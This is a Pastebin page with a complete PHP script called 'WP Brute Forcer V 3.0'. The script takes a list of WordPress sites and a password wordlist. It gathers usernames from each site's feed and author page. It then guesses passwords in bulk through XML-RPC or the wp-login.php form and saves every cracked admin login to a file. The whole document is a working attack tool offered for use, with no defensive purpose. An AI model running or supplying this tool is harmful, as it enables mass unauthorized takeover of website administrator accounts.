Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?
- error_reporting(0);
- set_time_limit(0);
- ini_set('memory_limit', '640000M');
- echo"
- [#]=============================[#]
- [#] WP Brute Forcer V 3.0 [#]
- [#] Nani17 - fb.com/root.sy3 [#]
- [#] MaDe By Islam [#]
- [#] Last Update : 26/9/2014 [#]
- [#]=============================[#]
- ";
- //$f1 = fopen("coki.txt","w");
- //fclose($f1);
- echo"\n(Enter Sites List) => ";
- $sites = trim(fgets(STDIN,1024));
- $k2=trim(@file_get_contents($sites));
- $list2=@explode("\n",$k2);
- $count2 =count($list2);
- echo"(Enter wordlist) => ";
- $wl = trim(fgets(STDIN,1024));
- $k=trim(@file_get_contents($wl));
- $list=@explode("\n",$k);
- $count =@count($list);
- if($k){
- echo"\n[*] $count2 site and $count password loaded \n";
- echo"\n[*] Cracking ... \n\n";
- }else{
- echo "[*] no file found \n";
- exit();
- }
- function brute($list2,$list){
- foreach($list2 as $site){
- $site = trim($site);
- $gets = $site."/wp-trackback.php";
- $ch2 = curl_init();
- curl_setopt($ch2, CURLOPT_URL, $gets);
- curl_setopt($ch2, CURLOPT_HEADER, 0);
- curl_setopt($ch2,CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch2,CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch2, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
- $result2 = curl_exec($ch2);
- curl_exec($ch2);
- curl_close($ch2);
- if(preg_match("/need/i",$result2)){
- $user = $site."/?feed=atom";
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $user);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
- $result = curl_exec($ch);
- curl_exec($ch);
- curl_close($ch);
- preg_match('#<name>(.*?)</name>#', $result, $username);
- $user1 = $site."/?author=1";
- $ch1 = curl_init();
- curl_setopt($ch1, CURLOPT_URL, $user1);
- curl_setopt($ch1, CURLOPT_HEADER, 0);
- curl_setopt($ch1,CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch1,CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch1, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
- $result1 = curl_exec($ch1);
- curl_exec($ch1);
- curl_close($ch1);
- preg_match('#<title>(.*?)</title>#', $result1, $username1);
- $account = explode(' |', $username1[1]);
- $check = @get_headers($site."/xmlrpc.php");
- $uz = $site."/wp-admin/";
- $method1 = strlen($username[1]);
- $method2 = strlen($account[0]);
- $dataz = "
- <methodCall>
- <methodName>wp.getUsersBlogs</methodName>
- <params>
- <param><value><string>adminnnn</string></value></param>
- <param><value><string>adminnnn</string></value></param>
- </params></methodCall>
- ";
- $curlz = curl_init();
- curl_setopt($curlz,CURLOPT_URL, $site."/xmlrpc.php");
- curl_setopt($curlz,CURLOPT_USERAGENT,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
- curl_setopt($curlz,CURLOPT_HTTPHEADER,$headers);
- curl_setopt($curlz,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($curlz,CURLOPT_FOLLOWLOCATION,1);
- curl_setopt($curlz,CURLOPT_TIMEOUT,10);
- curl_setopt($curlz,CURLOPT_CONNECTTIMEOUT,10);
- curl_setopt($curlz,CURLOPT_COOKIEJAR, getcwd()."./wp-cookie.txt");
- curl_setopt($curlz,CURLOPT_COOKIEFILE, getcwd()."./wp-cookie.txt");
- curl_setopt($curlz,CURLOPT_POSTFIELDS, $dataz);
- $resultz = curl_exec($curlz);
- curl_close($curlz);
- if(eregi("200",$check[0]) && !eregi("<string>parse error. not well formed</string>" , $resultz)){
- if(isset($username[1]) && $method1 > 0 && $method1 <= 15){
- foreach($list as $pass){
- $pass = trim($pass);
- $headers = array('Content-Type: application/x-www-form-urlencoded');
- $isadmin = '<name>isAdmin</name>';
- #############################
- ## TESTING EACH PASSWORD ##
- #############################
- $data = "
- <methodCall>
- <methodName>wp.getUsersBlogs</methodName>
- <params>
- <param><value><string>$username[1]</string></value></param>
- <param><value><string>$pass</string></value></param>
- </params></methodCall>
- ";
- $curl = curl_init();
- curl_setopt($curl,CURLOPT_URL, $site."/xmlrpc.php");
- curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
- curl_setopt($curl,CURLOPT_HTTPHEADER,$headers);
- curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
- curl_setopt($curl,CURLOPT_TIMEOUT,10);
- curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,10);
- curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./wp-cookie.txt");
- curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./wp-cookie.txt");
- curl_setopt($curl,CURLOPT_POSTFIELDS, $data);
- $result = curl_exec($curl);
- curl_close($curl);
- ##########################
- ## CHECK IF IT WORKED ##
- ##########################
- if(strstr($result, $isadmin)){
- echo"[+] Password is : $pass\n";
- $fo = fopen("jh.txt","a+");
- fwrite($fo,"[+] $site/wp-admin\n $username[1]:$pass\n\n");
- fclose($fo);
- break;
- }
- else{
- echo "[-] $site : ($username[1]:$pass) -> error\n";
- }}}
- elseif($method1 == 0 && isset($account[0]) && $method2 <= 15){
- foreach($list as $pass){
- $headers = array('Content-Type: application/x-www-form-urlencoded');
- $isadmin = '<name>isAdmin</name>';
- #############################
- ## TESTING EACH PASSWORD ##
- #############################
- $data = "
- <methodCall>
- <methodName>wp.getUsersBlogs</methodName>
- <params>
- <param><value><string>$account[0]</string></value></param>
- <param><value><string>$pass</string></value></param>
- </params></methodCall>
- ";
- $curl = curl_init();
- curl_setopt($curl,CURLOPT_URL, $site."/xmlrpc.php");
- curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
- curl_setopt($curl,CURLOPT_HTTPHEADER,$headers);
- curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
- curl_setopt($curl,CURLOPT_TIMEOUT,10);
- curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,10);
- curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./wp-cookie.txt");
- curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./wp-cookie.txt");
- curl_setopt($curl,CURLOPT_POSTFIELDS, $data);
- $result = curl_exec($curl);
- curl_close($curl);
- ##########################
- ## CHECK IF IT WORKED ##
- ##########################
- if(strstr($result, $isadmin)){
- echo"[+] Password is : $pass\n";
- $fo = fopen("jh.txt","a+");
- fwrite($fo,"[+] $site/wp-admin\n $account[0]:$pass\n\n");
- fclose($fo);
- break;
- }
- else{
- echo "[-] $site : ($account[0]:$pass) -> error\n";
- }}}
- else{
- $admin = "admin";
- foreach($list as $pass){
- $pass = trim($pass);
- $headers = array('Content-Type: application/x-www-form-urlencoded');
- $isadmin = '<name>isAdmin</name>';
- #############################
- ## TESTING EACH PASSWORD ##
- #############################
- $data = "
- <methodCall>
- <methodName>wp.getUsersBlogs</methodName>
- <params>
- <param><value><string>$admin</string></value></param>
- <param><value><string>$pass</string></value></param>
- </params></methodCall>
- ";
- $curl = curl_init();
- curl_setopt($curl,CURLOPT_URL, $site."/xmlrpc.php");
- curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
- curl_setopt($curl,CURLOPT_HTTPHEADER,$headers);
- curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
- curl_setopt($curl,CURLOPT_TIMEOUT,10);
- curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,10);
- curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./wp-cookie.txt");
- curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./wp-cookie.txt");
- curl_setopt($curl,CURLOPT_POSTFIELDS, $data);
- $result = curl_exec($curl);
- curl_close($curl);
- ##########################
- ## CHECK IF IT WORKED ##
- ##########################
- if(strstr($result, $isadmin)){
- echo"[+] Password is : $pass\n";
- $fo = fopen("jh.txt","a+");
- fwrite($fo,"[+] $site/wp-admin\n $admin:$pass\n\n");
- fclose($fo);
- break;
- }
- else{
- echo "[-] $site : ($admin:$pass) -> error\n";
- }
- }}
- }
- else{
- if(isset($username[1]) && $method1 > 0 && $method1 <= 15){
- foreach($list as $pass){
- $pass = trim($pass);
- $ch = curl_init();
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch,CURLOPT_URL,$site.'/wp-login.php');
- curl_setopt($ch,CURLOPT_COOKIEJAR,"coki.txt");
- curl_setopt($ch,CURLOPT_COOKIEFILE,"coki.txt");
- curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
- curl_setopt($ch,CURLOPT_POST,TRUE);
- curl_setopt($ch,CURLOPT_POSTFIELDS,"log=".$username[1]."&pwd=".$pass."&wp-submit=Giri"."&redirect_to=".$uz."&testcookie=1");
- $exec = curl_exec($ch);
- curl_close($ch);
- if(preg_match("/profile.php/",$exec)){
- echo"[+] Password is : $pass\n";
- $fo = fopen("jh.txt","a+");
- fwrite($fo,"[+] $site/wp-admin\n $username[1]:$pass\n\n");
- fclose($fo);
- break;
- }
- else{
- echo "[-] $site : ($username[1]:$pass) -> error\n";
- }
- }}
- elseif($method1 == 0 && isset($account[0]) && $method2 <= 15){
- foreach($list as $pass){
- $pass = trim($pass);
- $ch = curl_init();
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch,CURLOPT_URL,$site.'/wp-login.php');
- curl_setopt($ch,CURLOPT_COOKIEJAR,"coki.txt");
- curl_setopt($ch,CURLOPT_COOKIEFILE,"coki.txt");
- curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
- curl_setopt($ch,CURLOPT_POST,TRUE);
- curl_setopt($ch,CURLOPT_POSTFIELDS,"log=".$account[0]."&pwd=".$pass."&wp-submit=Giri"."&redirect_to=".$uz."&testcookie=1");
- $exec = curl_exec($ch);
- curl_close($ch);
- if(preg_match("/profile.php/",$exec)){
- echo"[+] Password is : $pass\n";
- $fo = fopen("jh.txt","a+");
- fwrite($fo,"[+] $site/wp-admin\n $account[0]:$pass\n\n");
- fclose($fo);
- break;
- }
- else{
- echo "[-] $site : ($account[0]:$pass) -> error\n";
- }}}
- else{
- foreach($list as $pass){
- $pass = trim($pass);
- $ch = curl_init();
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch,CURLOPT_URL,$site.'/wp-login.php');
- curl_setopt($ch,CURLOPT_COOKIEJAR,"coki.txt");
- curl_setopt($ch,CURLOPT_COOKIEFILE,"coki.txt");
- curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
- curl_setopt($ch,CURLOPT_POST,TRUE);
- curl_setopt($ch,CURLOPT_POSTFIELDS,"log=admin&pwd=".$pass."&wp-submit=Giri"."&redirect_to=".$uz."&testcookie=1");
- $exec = curl_exec($ch);
- curl_close($ch);
- if(preg_match("/profile.php/",$exec)){
- echo"[+] Password is : $pass\n";
- $fo = fopen("jh.txt","a+");
- fwrite($fo,"[+] $site/wp-admin\n admin:$pass\n\n");
- fclose($fo);
- break;
- }
- else{
- echo "[-] $site : (admin:$pass) -> error\n";
- }
- }}}
- }}}
- brute($list2,$list);
- ?>
Add Comment
Please, Sign In to add comment